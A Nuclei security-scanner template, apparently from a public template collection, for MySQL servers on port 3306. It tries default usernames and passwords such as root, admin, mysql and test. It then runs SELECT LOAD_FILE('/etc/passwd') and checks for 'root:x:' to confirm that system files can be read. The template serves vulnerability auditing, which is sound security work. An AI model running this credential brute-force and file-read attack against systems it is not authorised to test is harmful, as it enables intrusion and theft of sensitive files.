id: mysql-load-file info: name: MySQL LOAD_FILE - Enable author: pussycat0x severity: high description: | The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities. reference: - https://nmap.org/nsedoc/scripts/mysql-databases.html metadata: verified: true max-request: 16 shodan-query: "port:3306" tags: js,mysql,network,audit javascript: - code: | let m = require('nuclei/mysql'); let c = m.MySQLClient(); let response = c.ExecuteQuery(Host,Port,User,Pass,Query); Export(response); args: Host: "{{Host}}" Port: "3306" Query: SELECT LOAD_FILE('/etc/passwd') User: "{{usernames}}" Pass: "{{passwords}}" payloads: usernames: - root - admin - mysql - test passwords: - root - admin - mysql - test attack: clusterbomb stop-at-first-match: true matchers-condition: and matchers: - type: dsl dsl: - success == true - type: word words: - "root:x:" extractors: - type: json part: response json: - .Rows[] # digest: 4b0a00483046022100907d860204e982df899d9b32c76da23e00fdc18883029567f173190cd5ed7421022100ca703635c58c61a43a8c473060117cb60312849b2a2037b1c48828dd3c350a09:922c64590222798bb761d5b6d8e72950